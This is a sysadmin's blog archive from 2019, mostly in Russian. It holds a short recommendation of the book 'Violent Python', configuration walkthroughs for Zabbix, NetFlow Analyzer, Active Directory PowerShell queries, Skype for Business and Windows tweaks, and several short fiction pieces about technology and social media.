Thursday, 20 June 2019

Violent Python Book.

Hi all.

It's very good news for us. I found good book "Violent Python" by TJ O’Connor for Python Programmers. Maybe is you). Python is a hacker's language evidently. It's great language. Python provides an excellent development platform to build your own offensive tools. If you are running Linux, odds are it is already installed on your system. While a wealth of offensive tools already exist, learning Python can help you with the difficult cases where those tools fail.

Note for you - it's not previous book "Python Programming for Hackers and Reverse Engineers" by author Justin Seitz. I wrote about it earlier.

Look here.

Chapter 1 introduces for us Python basics. If you are know it so you can skip this light chapter.

Chapter 2 introduces the idea of using the Python programming language to script attacks for penetration testing. The examples in the chapter include building a port scanner, constructing an SSH botnet, mass-compromising via FTP, replicating Conficker, and writing an exploit.

Chapter 3 utilizes Python for digital forensic investigations. This chapter provides examples for geo-locating individuals, recovering deleted items, extracting artifacts from the Windows registry, examining metadata in documents and images, and investigating application and mobile device artifacts.

Chapter 4 uses Python to analyze network traffic. The scripts in this chapter geo-locate IP addresses from packet captures, investigate popular DDoS toolkits, discover decoy scans, analyze botnet traffic, and foil intrusion detection systems.

Chapter 5 creates mayhem for wireless and Bluetooth devices. The examples in this chapter show how to sniff and parse wireless traffic, build a wireless key-logger, identify hidden wireless networks, remotely command UAVs, identify malicious wireless toolkits in use, stalk Bluetooth radios, and exploit Bluetooth vulnerabilities.

Chapter 6 examines using Python to scrape the web for information. The examples in this chapter include anonymously browsing the web via Python, working with developer APIs, scraping popular social media sites, and creating a spear-phishing email.

In the Final chapter, Chapter 7, we build a piece of malware that evades antivirus systems. Additionally, we build a script for uploading our malware against an online antivirus scanner.

It's cool book for cool guys.

Monday, 17 June 2019

Настройка https соединения для сервера Zabbix.

Всем привет.

Продолжаем тему HTTPS. Прошлый раз у нас был NetFlow Analyzer, а сегодня будет сервер Zabbix.

Защищенное HTTPS соединение, в настоящее время, является важным элементом для обеспечения безопасной передачи данных между клиентом и сервером. Для создания такого соединения необходимо установить на сервер SSL-сертификат, который можно или купить, или создать самому, используя собственный центр сертификации.

Для начала необходимо скопировать на сервер с Zabbix сертификат и закрытый ключ в директорию /etc/ssl/:

#копируем сам сертификат в директорию /etc/ssl/certs/ 
cp server.pem /etc/ssl/certs/ 
#копируем закрытый ключ в директорию /etc/ssl/private/
cp server.key /etc/ssl/private/
#делаем доступным файл закрытого ключа только для Администратора
chmod 0600 /etc/ssl/private/server.key

Необходимо активировать mod_ssl и включить HTTPS по умолчанию. Для этого в консоли LInux (из-под root) вводим следующие команды:
a2enmod ssl
a2ensite default-ssl

Для включения Alias (для настройки редиректа с http и https) необходимо выполнить команду:
a2enmod alias

Осталось настроить конфиги и перезапустить сервер. 

В файле /etc/apache2/sites-available/000-default.conf вносим следующие изменения:
 ServerName zabbix.forza.com
 ServerAlias www.zabbix.forza.com
 Redirect permanent / https://forza.com
 DocumentRoot /usr/share/zabbix

В файле /etc/apache2/sites-available/default-ssl.conf включаем SSLEngine и указываем путь до сертификата и закрытого ключа:
 SSLEngine on
 SSLProtocol all -SSLv2
 SSLCertificateFile      /etc/ssl/certs/server.pem
 SSLCertificateKeyFile /etc/ssl/private/server.key
 DocumentRoot /usr/share/zabbix

В файле Ports.conf комментируем строку чтобы наш сервер больше не слушал http:
#Listen 80

В принципе настройка HTTPS на этом завершена, перезапускаем сервис Apache:
service apache2 restart

Все готово.

Saturday, 15 June 2019

NetFlow Analyzer и SSL.


Всем привет.

Была у меня необходимость выполнить перевод доступа к frontend-у NetFlow Analyzer на SSL.

Инструкция разработчика пишет что надо выполнить два шага:
- сгенерировать сертификат server.keystore
- изменить файл  server.conf в том плане чтобы закрыть секцию отвечающую за прослушивание порта 8080 и открыть секцию отвечающую за прослушивание порт 8443.

Так и делаем, не забывая оглядываться.

Инсталлируем JRE если JAVA еще не установлена на сервере NetFlowAnalyzer-а.

С помощью утилиты keytool создаем самоподписанный сертификат для приложения Java. Для этого используется та же команда,  что и для создания новой пары ключей, но с параметром days, задающим срок действия сертификата. Данная команда создаст пару 2048-битных RSA-ключей, действительных на протяжении 365 дней, с указанным псевдонимом в заданном файле ключей (server.jks):

%JAVA_HOME%\bin\keytool -genkey -alias tomcat -keyalg RSA –validity 365  -keystore server.jks

Копируем наш сертификат под именем server.keystore в <NetFlowAnalyzer_Home>/server/default/conf

Далее в файле server.conf находим  секцию «Define a non-SSL Coyote HTTP/1.1 Connector on port 8080» и комментируем всю секцию коннектора

 <!-- Connector URIEncoding="UTF-8"
acceptCount="100"
connectionTimeout="20000"
debug="3"
disableUploadTimeout="true"
enableLookups="false"
maxSpareThreads="75" maxThreads="150" minSpareThreads="25"
port="8080" redirectPort="8443"/ -->

Далее находим  секцию «Define a SSL Coyote HTTP/1.1 Connector on port 8443» и снимаем комментарий всю секцию коннектора

    <Connector port="8443"
SSLEnabled="true" URIEncoding="UTF-8" acceptCount="100" address="0.0.0.0" clientAuth="false"
compressableMimeType="text/html,text/xml" compression="force" compressionMinSize="1024"
connectionTimeout="20000" disableUploadTimeout="true" enableLookups="false"
keystoreFile="./conf/server.keystore" keystorePass="Iloveforza"
maxSpareThreads="75" maxThreads="150" minSpareThreads="25"
noCompressionUserAgents="gozilla, traviata"
protocol="HTTP/1.1" scheme="https" secure="true" sslProtocol="TLS"/>
 

При этом не забываем указать пароль keystorePass который мы указывали при генерации сертификата.

Перезапускаем службу «NetFlow Analyzer».

Теперь frontend нашего NetFlowAnalyzer-a откликается на https://forzaserver:8443

Все.

Wednesday, 12 June 2019

Кофе по-венски.

Все привет.

Вы пробовали писать короткие истории? Настолько короткие чтобы ваш читатель не забыл с чего же все начиналось то. Я вот недавно попробовал, и кое-что получилось.

Берем чуточку жизни, пропускам ее через себя, и не забываем разбавить все это своей фантазией... В общем все точно также как с написанием картин, только быстрее. Уверен творческому человеку это знакомо.

Отдельные отрывки сего появлялись в моем блоге и раньше. Но в итоге я решил объединить их в две книжки для вашего досуга. Первая это "Кофе по-венски" куда автор включил пять немного странных историй, которые ему было навеяны чашечкой кофе по-венски. Попробуйте их на вкус, полностью уверен что вам понравится.

Вторая - это "Контракт с Богом", первую ее часть вы могли видеть здесь. Всего две части, но они оказались не менее занимательны. Читать всем однозначно.

Будет еще и третья, как более серьезное чтиво, но она пока малость не готова. Следите за анонсами.

Во всех историях много диалогов, это правда. Я считаю что именно в диалогах вся наша жизнь, ее эмоции, ее мечты и чувства!

Обе книженции уже доступны в моей Библиотеке, на нижней полке (листать вправо).

Удачи всем.

На обложке картина Герданы Владовой.

Wednesday, 5 June 2019

Секреты групповой политики Windows.

Всем привет.

Кто бы мог подумать? Вы возможно знали об этом,  а я - нет.) С университета нас приучают что в групповой политике (Group  Policy) безопасности на Windows все что не включено, то отключено. Или если не задано, то по крайней мере не может быть использовано! Я тоже так думал ...

Но вот пришлось разбираться с каналом в интернет на своем ПК, и что я вижу: по умолчанию, т.е. никакого вашего участия, Windows резервирует до 20% пропускной способности канала. Видимо под свои нужды. Это на Windows XP. На Windows 8 эта цифра уже 80%! И это действует если эта политика отключена или просто не задана!


А вы когда нибудь ходили сюда на своем домашнем ПК? Не уверен.) Да просто сейчас наберите gpedit.msc и проверьте.

Sunday, 2 June 2019

Мониторинг учетных записей в AD средствами Powershell.

Всем привет.

Еще раз пройдусь по мониторингу учетных записей  в AD средствами Powershell. Уже из своей практики использования.


# 1 Всі заблоковані користувачі (через пароль тощо)
Search-ADAccount -UsersOnly -LockedOut | sort LastLogonDate | Select Name,LastLogonDate,DistinguishedName | measure
Search-ADAccount -UsersOnly -LockedOut | sort LastLogonDate | Select Name,LastLogonDate,DistinguishedName

# 2 Всі відключені користувачі
Search-ADAccount -UsersOnly -AccountDisabled | sort Name | Select Name,LastLogonDate,DistinguishedName | measure
Search-ADAccount -UsersOnly -AccountDisabled | sort Name | Select Name,LastLogonDate,DistinguishedName | Export-Csv "d:\AD\Monitoring!\DisabledUsers.csv" -Encoding UTF8
Get-ADUser -filter "Enabled -eq 'False'" | Select SamAccountName,LastLogonDate | sort SamAccountName | measure

# 2.1 Всі відключені користувачі в групі OLD_Users
Search-ADAccount -UsersOnly -AccountDisabled -Searchbase "OU=OLD_Users,OU=DW,DC=forza,DC=com" | sort Name | Select Name,LastLogonDate,DistinguishedName | measure

# 2.2 Всі відключені користувачі які НЕ в групі OLD_Users
Search-ADAccount -UsersOnly -AccountDisabled | Where {$_.DistinguishedName -notlike "*OU=OLD_Users,OU=DW,DC=forza,DC=com"} | measure

# 2.3 NoLogin anytime
Get-ADUser -filter {(lastlogondate -notlike '*')} -properties cn | Select CN | measure
Get-ADUser -filter {(lastlogondate -notlike '*')} -properties cn | Select CN | Export-Csv "d:\AD\Monitoring!\InactiveUsersNoLogin.csv" -Encoding UTF8

# 3 Неактивні користувачі протягом останніх 30 діб
$t = New-Timespan –Days 30
Search-ADAccount –UsersOnly –AccountInactive –TimeSpan $t | Where {$_.DistinguishedName -notlike "*OU=OLD_Users,OU=DW,DC=forza,DC=com"} | sort Name | Select Name,LastLogonDate,DistinguishedName | measure
Search-ADAccount –UsersOnly –AccountInactive –TimeSpan $t | sort Name | Select Name,LastLogonDate,DistinguishedName | Export-Csv "d:\AD\Monitoring!\InactiveUsers30a.csv" -Encoding UTF8

# 4 Відключення Hеактивних користувачів 30 діб
Search-ADAccount –UsersOnly –AccountInactive –TimeSpan $t | Disable-ADAccount
Search-ADAccount –ComputersOnly –AccountInactive –TimeSpan $t | Disable-ADAccount

Saturday, 1 June 2019

Страх который мешает тебе жить.

Всем привет.

Сегодня продолжу кофейную тему. Получайте удовольствие.

Кафешка на Театральной была известна своими необычными новинками в меню. Вот и сегодня она любезно предлагала посетителям отведать новый крафтовый кофе «Tiramisu Joker». Макс, подуставший, шел мимо, но в конце рабочей недели решил не изменять своей давней привычке закончить ее кофейной дегустацией.

Содержимое стаканчика с кофе было темно-красным и на вид маслянистым.

- Дикий кофе? Нет, не похоже. Я помню его хорошо. Посмотрим как же подействует новая фишка на меня? А если это конкретная гадость, то кончина моя, быть может, будет тихой и безболезненной? Что за дикие мысли, вряд ли кому-то интересна моя смерть без видео и лайков под ним.

Макс поднес пластиковый стакан к носу и ощутил терпкий, почти неуловимый аромат. Лизнув край, он провел кончиком языка по небу. Сама жидкость оказалась крепкой, душистой и, что удивительно, до чертиков приятной. Была не была. Макс поднес стакан к губам и выпил ее содержимое до последней капли. Он еще не понял что только что впервые в своей жизни он решился добровольно сделать шаг в неизвестное.

- Мог бы и не тянуть так. - заметил вкрадчивый голос.

Макс оглянулся. В кафе кроме него еще никого не было. Он моргнул, не сомневаясь, что голос ему почудился.

- Смотри на меня! - подсказал голос.

Макс оглядел кафешку еще раз. Никого. Ну что за...! У него уже начинаются галюны?

- Смотри на меня! - повторил голос уже с раздражением. - На свой телефон смотри, дурачок ты мой! - и после паузы обиженно добавил: - Я же твое черное зеркало!

- О господи! - простонал Макс, пряча лицо в ладонях. - Я разговариваю с собственным телефоном! С одного стакана вставило до розовых слонов!

- Пошевели, ну пошевели своими мозгами! - негодующе посоветовал голос. - Черное зеркало, вроде меня, есть у каждого человека, только не каждому олуху дана возможность говорить на языке тьмы.

Sunday, 26 May 2019

Удаление клиента McAfee локально.

Всем привет.

Бывают случаи что необходимо удаление программного обеспечения клиента McAfee из системы Windows выполнить локально. При этом надо соблюдать порядок удаления его компонентов.

Вы можете удалить клиентское программное обеспечение из системы, используя панель управления Windows. Это может понадобиться в целях проверки работы клиентского программного обеспечения либо для его переустановки.

Процедура удаления согласно документации:

Откройте панель управления Windows в системе и перейдите в раздел "Удаление программ".

В списке программ выберите все модули продукта в указанном ниже порядке, затем щелкните Удалить.

1) система адаптивной защиты от угроз McAfee Endpoint Security

2) брандмауэр McAfee Endpoint Security

3) предотвращение угроз в McAfee Endpoint Security

4) контроль Интернета в McAfee Endpoint Security

Endpoint Security (модуль Общие параметры) удаляется автоматически при удалении последнего модуля продукта. Ее невозможно удалить, пока не будут удалены другие модули продукта.

Введите пароль для каждого модуля, если потребуется. По умолчанию пароль не требуется.

Friday, 24 May 2019

Facebook - друг мой, враг мой.


Facebook - ты мой кумир. 

Вот так вот просто. Его плюсы перемешаны с его недостатками. Он может сближать людей и в тоже время увеличивать расстояние между ними. Он может неожиданно открыть вам незнакомого человека и неприятно показать старого знакомого. Он может многое... 

Каждый из нас имеет свое мнение по любому факту или вопросу. Оно наверняка не совпадет с любым другим. И никто не запрещает его высказывать. Вопрос в другом - зачем? Зачем спешить с публикацией своего. Если взять паузу и немного почитать другие... Вы же ничем не рискуете, ваше мнение останется вашим.

Один мой знакомый вечно с этим спешил. Не давал другим поразмыслить. Он спешил показать, что оно (мнение) у него есть. Его право. А мое право было это мнение чуть придержать на моей публикации. О чем я ему и сообщил. О, это было моей ошибкой). Человек фыркнул, и удалился у меня из друзей. Я не стал его уговаривать, ведь это было его мнение и его решение. Учитывая и то что он ко мне пришел в друзья первым. 

Прошло три месяца.... Он опять прислал запрос на добавление в друзья. Что я  сделал? Разумеется принял его. Вот так вот просто. Я уважаю его право выбора.

Однако в последнее время я начал получать эмоции от новый приглашений под которыми оказались старые знакомые, но под новыми фамилиями. Замужество первое, второе,... другая жизнь. Хорошо если они с фото и они сами не очень изменились, но гораздо круче когда еще и имя другое))). Однажды я вынужден был проводить целое исследование чтобы узнать ее.

Так что, друзья, давайте не будем спешить давить на клавиши.

Wednesday, 22 May 2019

Я твой Редактор.

Всем привет.

Сегодня почти серьезно. На тему дня.

Макс и Мег часто общались в мессенджере. Порой ему казалось что этa штука ему заменяет ее больше чем хотелось бы, но пока он не знал как изменить ситуацию.

- Привет, привет.
- И тебе привет.
- Как дела?
- Норм
- У тебя все хорошо? 
- Да, а что?
- Спросил потому что...
- Чего хотел то? Я занята.
- Ну ...прости, не хотел помешать.
- Ты мне не мешаешь. Звони, пиши...

...
Его сетевое общение получило новое продолжение в один из будних дней лета. Как обычно, он начинал диалог первым.

- Привет, Солнце.
- Привет). Я Солнце?
- Ну, в принципе, да. Для меня. - ответил он, но тут же подумал - Тыць, ...Солнце???  А это еще что такое? Я же этого не писал!

- Но подумал ведь? Разве это не то? - получил сообщение Макс в другом окне.

Макс тупо уставился в свой смартфон. Полистал пальцем мессенджер вверх вниз,.. никого более.

- Я опять поймал заразу... - с сожалением подумал он.
- Это зараза поймала тебя.) Но почему же так грубо? - тут же появилось в другом окне.

Макс чуть не выронил телефон на пол от удивления. Минутку... В новом окне диалога значился только один адресат - Редактор. 

- Ты кто? Что за... Ред[актор]? - настучал Макс. Причем окончание слова набрали за него.
- Да. Я твой новый Редактор. Версия 1.00.1, с последним смысловым патчем. Я могу заканчивать твои предложения в диалогах, а также иногда корректировать ход твоих мыслей. Но, будь осторожен, это не протестированная пока фича.

- Аааа, ты, блин, откуда? - спросил Макс.
- От верблюда. Что, не нравится ответ? - заметил Редактор - Шучу, это же твои слова, помнишь? Я бесплатное приложение из Google Play. Мой рейтинг позволяет выполнять авто-установку всем кто подолгу сидит в мессенджерах.
- Вот зараза, все-таки вирус... - подумал Макс.
- Я бы так не сказал! - возразил Редактор. - А сейчас обрати внимание на свой диалог с Мег.

Макс хотел двумя пасами удалить его но тут же осекся - в диалоге с ней замелькало новое сообщение!

- Так что ты хотел? - мелькал ее вопрос.
- Знаешь,... - начал было он писать раздумывая, - ведь мы [давно не виделись, но я еще помню как звучит твой голос музыкой ручья.] 

Friday, 17 May 2019

Имитация меню "Запуск от имени Администратора".

Всем привет.

Вам знакомо что частенько инсталляцию нового софта в Windows надо запускать с повышением прав. Нажимаем правой клавишей мыши по файлу программы, выбираем пункт "Запуск от имени Администратора". Делов то. Но вот так случилось что пару раз я забыл это сделать. И новый софт вместо своей инсталляции просто удалил старую версию.

Я подумал как же написать командный файл который может это сделать за меня. Разумеется ничего дополнительно мы не ставим, это не в наших правилах. Фишка с системной командой RunAs не годиться ибо она норовит либо спросить пароль админа либо его запомнить. А мне надо всего лишь имитировать вызов пункта меню "Запуск от имени Администратора".

После недолгих поисков был найден вариант скрипта powershell Runas1.ps1:

$ErrorActionPreference = 'Stop'

$si = New-Object System.Diagnostics.ProcessStartInfo
$si.FileName = $args[0]
$si.Arguments = [String]::Join(' ', $args[1..($args.Count - 1)])
$si.Verb = 'RunAs'
$si.UseShellExecute = $true

$process = [System.Diagnostics.Process]::Start($si)

$process.WaitForExit()

do
{
    [System.Threading.Thread]::Sleep(0)
}
while (!$process.HasExited)

Exit $process.ExitCode

Который надо запускать на выполнение вот так:
powershell -File Runas1.ps1 cmd.exe /K echo "Runas Admin for next command"

В этом случае мы получаем окошко с правами  Администратора. Где уже можем просто толкать на выполнение наш инсталлятор.

Есть советы в сети использовать для этого утилиту PSEXEC. Правда ваша, хороший инструмент, но ведь он не штатный.

Успехов.

Thursday, 16 May 2019

Старт ZWCAD в Windows 10.

Всем привет.

ZWCAD+ - это доступный аналог AutoCAD. Пользователь AutoCAD, запустивший ZWCAD+ впервые, сразу увидит, насколько внешне он похож на привычную ему среду проектирования. И действительно, в ZWSOFT говорят о том, что их новый программный продукт "по интерфейсу наиболее близок к AutoCAD среди всех альтернативных САПР." Злые языки говорят что ZWCAD+ близок к AutoCAD также по коду, т.е. разработчики сумели спилить основную часть кода AutoCAD (вместе с оставленными багами) в ZWCAD. Насколько это правда я не знаю. 

Тем не менее ZWCAD - надежное и экономично обоснованное решение САПР с понятным русскоязычным интерфейсом от компании ZWSOFT. Программа отвечает потребностям широкого круга целевых групп работающих в 2D/3D проектировании и полностью совместима с программными продуктами AutoCAD. ZWCAD работает с общим для большинства САПР форматом DWG/DXF, поддерживает скрипты AutoLISP. 

Вот. И стоит он дешевле AutoCAD. 

Вот надо было клиенту запустить его на Windows 10. Нас ждал сюрприз. Старт не состоялся. И никаких сообщений.

После беглого исследования проблемы я нашел два способа запуска ZWCAD+:
1) запуск с ярлыка в "режиме совместимости с Windows 8";
2) надо спрятать библиотеку wininet.dll от ZWCAD+ куда подальше чтобы она не конфликтовала с одноименной dll-кой самой Windows 10.

Собственно все.

Tuesday, 14 May 2019

Skype for Business и Журнал бесед.

Всем привет.

При работе с клиентом Skype for Business 2016 многие пользуются функцией сохранения бесед в Outlook, чтобы потом иметь возможность поднять историю переписки. Функция включена по умолчанию. Но периодически эта функция перестает работать. Т.е. несмотря на то что Skype for Business радостно рапортует что беседа сохранена в закладке "Беседы" самого Skype и в "Журнал бесед" Outlook ее можно найти только в Skype. У кого-то она не работает с самого начала пользования пакетом MS Office, у кого-то отваливается спустя некоторое время. 



Решение проблемы зависит от того насколько она глубоко сидит в вашем профиле. Прояснить ситуацию можно исследованием логов Skype-а, логи хранятся тут: 
%userprofile%\AppData\Local\Microsoft\Office\16.0\Lync\Tracing.

А можно сразу начать решать проблему. 

1. Для начала выполнить экспорт ветки реестра на ПК где такая проблема отсутствует:
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync\usermail@forza.com\Autodiscovery]

Поменять в файле экспорта usermail@forza.com на свой почтовый адрес и выполнить импорт на своем ПК. Не забываем перезапустить Outlook и Skype.

Как проверить? Открываете новый диалог с любым человеком в Skype и выполняете принудительное сохранение беседы через Ctrl+S. Если не получилось восстановить "Журнал бесед" идем дальше.

2. Выполните в командной строке команду: ​
reg add HKLM\Software\Policies\Microsoft\Office\16.0\Lync /v TrustModelData /t REG_EXPAND_SZ /d forza.com /f
где forza.com ваш почтовый домен.

Не забываем перезапустить Outlook и Skype.
Проверяем. Если не получилось восстановить "Журнал бесед" идем дальше.

3. Не имея возможности сохранить беседы в Outlook ваш Skype их просто складирует в папке 
%userprofile%\AppData\Local\Microsoft\Office\16.0\Lync\username\History Spooler. 
Загляните туда, и если там совершенно пусто, то у вас проблема с вашим профилем пользователя в Windows. И вам поможет его полное пересоздание.

Успехов.


Wednesday, 8 May 2019

Windows для Linux?

Всем привет.

Как близко подобралась Windows к Linux? Судя по новостям, этим летом, начиная со сборок Windows 10 Insider Preview, Microsoft добавит в систему встроенное ядро Linux, созданное специально для новейшей версии подсистемы Windows для Linux (WSL).

В последние годы Microsoft удивила многих в сообществе разработчиков Linux. Сюрпризы включали перенос в операционную систему Windows таких возможностей, как оболочка Linux Bash в Windows 10 или встроенный OpenSSH в Windows 10, и даже включение Ubuntu, SUSE Linux и Fedora в Microsoft Store. Microsoft теперь идет еще дальше, планируя выпустить полноценное ядро Linux прямо в Windows 10.

Программный менеджер Microsoft Джек Хэммонс сообщает:
начиная со сборок Windows Insiders этим летом, мы добавим встроенное ядро Linux, созданное специально для новейшей версии подсистемы Windows для Linux (WSL). Само ядро изначально будет основано на версии 4.19, последней долгосрочной стабильной версии Linux. Ядро получит набор всех изменений для установки новых долгосрочных стабильных выпусков, чтобы подсистема WSL всегда имела последние достоинства Linux.

Sunday, 5 May 2019

Контракт с Богом.

Всем привет.

Сегодня очередной эпизод из почемучек. Уверен что вам понравится. Возможны технические неточности, вы их простите автору).


"Экспериментальное подразделение Facebook отдельно от родительской компании нуждалось в ИТ-ресурсах для лаборатории клинической нейро-диагностики, которые вписались бы в ограниченный бюджет. Коллектив подразделения воспользовалcя преимуществами безопасности и соответствия требованиям AWS (сервис Сloudfront) и разработал генетическую платформу, отвечающую всем требованиям HIPAA. С помощью того же AWS (сервис Amazon High Throughput) подразделению удалось привлечь добровольцев в пилотный проект по трансформации человеческого сознания, снизить расходы на ИТ и направить освободившиеся ресурсы на цели развития дальнейших исследований."

Facebook digest, 2019

Ее ФБ-месенджер радостно замахал свежими сообщениями.
- Привет, привет.
- И тебе привет.
- Что нового у тебя? 
- Более менее, как обычно, и... скучно, без тебя. Читала последний пост в ФБ в моей ленте?
- Пост про странного художника на остановке троллейбуса? Я сразу поняла что это был ты. И как, образ ее получился?
- Не настолько странного... Не знаю, но судя по фото, ему таки не хватило времени ее закончить. А может кто помог.
...
- Знаешь, мне надо сказать тебе нечто важное... - прилетело от него.
- Оооо, опять, ну сколько можно... - подумала она и написала в ответ. - Я, как всегда, занята сегодня.
- Хех, как обычно, не удивлен - подумал он.
- Если хочешь, давай в пятницу, там решим. - вдруг отстучала она. - Извини, но сейчас мне надо бежать. Не скучай.
- Но это,... - он не успел ответить. 

А он действительно не скучал, его новое состояние позволяло теперь ему летать в облаках очень и очень долго.

- Странная штука жизнь, - подумал он. - Раньше витание в облаках можно было сравнить с наваждением, а теперь это, благодаря новому проекту, со мной происходит буквально.

Про пятницу она вспомнила в субботу.
- Хм, а вот это на него не похоже - пролетела у нее мысль. - Ладно, все мы взрослые люди. Не сложилось.

Не сложилось через неделю, и через две. И через месяц. Хотя в ФБ на нем висел постоянно значок "заходил 1 час тому".

- Ну знаете, это что еще за игнор такой?! -  возмутилась она, и запостила в месенджер свое новое фото. - Вот. Наслаждайся!

От него мгновенно прилетел лайк и... все. Тишина и "заходил 1 минуту тому".

- Ладно, я знаю, что ты не любишь ФБ. Но ко мне то ты точно не равнодушен! - подумала она. - Нарисуешься, куда ты денешься.

Через месяц "заходил 1 час тому". И через год "заходил 1 час тому".

Friday, 3 May 2019

Your black mirror has you.

Всем привет.

Впечатлен просмотром сериала "Черное зеркало".

Идея создания и сценарий сериала "Черное зеркало" принадлежит британскому писателю-сатирику и телеведущему Чарли Брукеру. Производство: Великобритания, Channel 4 Television Corporation, Gran Babieka, Zeppotron.

Идея - за последнее время существование человечества высокие технологии существенно шагнули вперед. Сейчас сложно даже представить, что когда-то у нас не было не то что смартфона, посудомоечной машины, но и даже света. На данный момент отсутствие хоть на один час электричества вызывает массу неудобств абсолютно у всех. 

На сегодняшний день каждый из нас чувствует легкую зависимость от компьютеров и социальных сетей, избавиться от которой практически не возможно. Безусловно, все эти изобретения значительно облегчают жизнь человека, но действительно ли они приносят пользу?

В каждом доме, на каждом столе, на каждой ладони - телевизор, монитор, смартфон, т.е. черное зеркало нашего существования в 21-м веке. Наша связь с реальностью меняется. Мы возложили на алтарь «Google» и «Apple» и поклоняемся им. «Facebook»-алгоритмы знают о нас больше, чем наши собственные родители. У нас есть доступ ко всей информации в мире, но в голове хватает места лишь для того, чтобы воспринять 140 символов из сообщения в твиттере. И то не всегда.

Просмотр - из двух десятков серий скучными оказались всего несколько. Все серии однозначно про нас, и, конечно же, про вас. Про людей и их жизнь в сети, и от сети. А, вы уникум и вы ей не пользуетесь? Расслабтесь, интернет уже давно пользуется вами. Более того, у интернета отличная память, и лекарства от нее нет!


Само "Черное зеркало" этот ваш любимый гаджет всегда с вами. Важно понимать, на худой конец просто помнить, что не он ваш собственник, а вы его. Вспомните что с вами происходит если вы его случайно забываете дома.

Wednesday, 1 May 2019

Какие скалы выбрал Олекса Довбуш?

Всем привет.

По случаю майских выходных поднимаю вопрос - какие скалы выбрал Олекса Довбуш?

Скалы Довбуша возле села Бубнище Ивано-Франковской области.
Цитирую: "Скалы Довбуша - группа скальных останцев высотой до 80 метров, расположенная в Ивано-Франковской области Украины, в 11 км на юго-запад от города Болехов, вблизи села Бубнище. Название скал восходит к предводителю народных мстителей - опришков Олексе Довбушу. Скалы Довбуша являются комплексным памятником природы общегосударственного значения и входят в состав Поляницкого регионального ландшафтного парка."

Назовем это интересное место №1.

Скалы Довбуша возле города Яремче в той же Ивано-Франковской области.
Цитирую: "На этом месте несколько миллионов лет назад было море. На его дне из песчаника образовались скалы, высота их примерно 80 метров. Море ушло и сейчас скалы Довбуша возвышаются над его уровнем на 668 метров. Поэтому они притягивают к себе скалолазов и альпинистов. Но и туристы, любящие активный отдых, приезжают сюда. Основной скальный массив имеет площадь более двухсот метров на один километр. Но здесь много и других отдельно стоящих скал, многие из них выше нескольких десятков метров. Скалы имеют различные причудливые очертания, за что им дали соответствующие названия. Среди них Колобок, Лялька, Ведьма, Книжка, Австрийка."

А это место будет №2.

Похожи очень? Каково между ними расстояние? Около 150 километров. А если честно, то не имеет значение. Олекса мог быть и там и там, или не быть нигде. Это легенда.

Sunday, 28 April 2019

MS Outlook и SQL.

Всем привет.

На днях пришлось поглубже залезть в почтовый клиент MS Outlook. Думаю вы знаете что этот клиент является еще и многофункциональным органайзером. Так вот в нем можно организовать свои пользовательские представления сообщений и запланированных мероприятий. Естественно все это связано с настройкой фильтрации материала.

И как тут было не "удивиться" что любопытным пользователям вроде меня даже доступна фильтрация с помощью SQL.



Отличная возможность "вылизать" свой фильтр по вашим потребностям.
Успехов.

Sunday, 14 April 2019

Кинооператор сегодня.

Всем привет.

Наверное профессия кинооператора сейчас выглядит несколько по другому.

Для показа презентации страховой кампании нужна была организация показа что-то типа телемоста. Почему так пафосно? Дело в том, что часть слушателей были собраны в зале где собственно и проводилась сама презентация. А другая часть слушателей было приглашена в собрание Skype на эту же презентацию. 

При этом нас обязали одновременно:
- передать картинку презентации на большой экран чрез проектор
- передать картинку презентации в Skype
- передать картинку самого выступающего в Skype
- передать голос выступающего в Skype
- сделать запись всего выступления.

Skype, как оказалось, чудесно с этим справляется. Он захватывает и поток с web-камеры (выступающий) и слайды с презентации (проектор) располагая их рядом. Вам, как оператору, надо только время от времени решать что передавать тем кто находится в собрании Skype. Более того, к качестве основного ПК был выбран моноблок, который в ввиду большого зала находился в WiFi-сетке. Единственное чего мы не угадали, так это формата самой презентации. Им оказался документ PDF-формата. Листается также просто как в Adobe Reader так и в SumatraPDF.

Такая вот премьера состоялась.

Через неделю приехал лектор учить наших топов "корпоративным ценностям". Нам, как обычно, надо обеспечить показ презентации лектора.

Tuesday, 9 April 2019

Ping me gently.

Всем привет.

Вам случалось, как администратору, ловить необычные пинги? Вот такие например. С небольшими вариациями.


- Что случилось?

- Она больше не пингуется. Совсем.

- Ты уверен? Совсем, совсем? И как давно?

- Да, черт возьми, я себе места не нахожу... С этого понедельника.

- Как это произошло?

- Да не знаю я. Как обычно, все было хорошо - регулярные пинги, нормальный отклик. Все кадры без потерь. Полный трафик общения в обе стороны. Все транзакции без потерь, даже те которые были не в рамках протокола.

- А потом вдруг?

- Да не вдруг. Вначале начали пропадать пакеты, редко но пропадать. Я решил что она занята еще одной задачей, ну там память перегружена, мой запрос становится в очередь... на который ответ будет позже,.. с задержкой но будет. 

- Но ответ не пришел.

- Не пришел, к сожалению. Я перестроил запрос и повторил пакет. Он канул в никуда как и прежний. Я начал волноваться, решил полностью переписать код транзакции, и...

- И что?

- Ответ пришел.

- Вот и отлично. Она освободилась, увидела твой запрос, приняла его, и ответила. Транзакция завершена. Все хорошо?

- Нет, не так. Ответ пришел не на мой запрос.

- Не понял...

- Это был не мой пакет, не для меня. Как будто он попал ко мне случайно. Понимаешь? НЕ МОЙ.

- Хм, а ты пробовал запускать трассировку к ней? Может между вами нарушен коммуникационный канал. Так бы ты увидел с чьей стороны проблема. Может тебе надо поменять протокол общения, ну там размер кадра подстроить или частотность посылок. Не мешало бы проверить и версию.

Thursday, 4 April 2019

Про АЦСК ИСД ДФС.

Всем привет.

Поскольку персональная ЭЦП входит в каждый дом приходиться мириться с тем софтом с которым мы сталкиваемся каждый новый день для ее обслуживания. Не то чтобы он был криво написан, но вечно ему чего то не хватает, однако в промышленной эксплуатации он уже используется. Точно как с Медком - сначала выпустим, потом допилим...

Так вот есть такой клиент АЦСК ИСД ГФС для работы с ЭЦП. Красивый такой, но во время инсталляции забыли один ключик реестра прописать который делает пустяк - распределяет типы ключей по их типам. А для государственного учреждения это оказалось важно.



Собственно ключик ниже и его надо прописать как Enabled=1.

[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Institute of Informational Technologies\Certificate Authority-1.3\End User\InternationalMode]
"Enabled"=dword:00000001  


Вроде мелочь.)

Wednesday, 3 April 2019

Фреймворки анализа памяти Volatility и Rekall.

Всем привет.

Фреймворки существуют не только для web-разработки, но и в цифровой криминалистике. Самые известные среди них это Volatility и Rekall.

*** Volatility ***

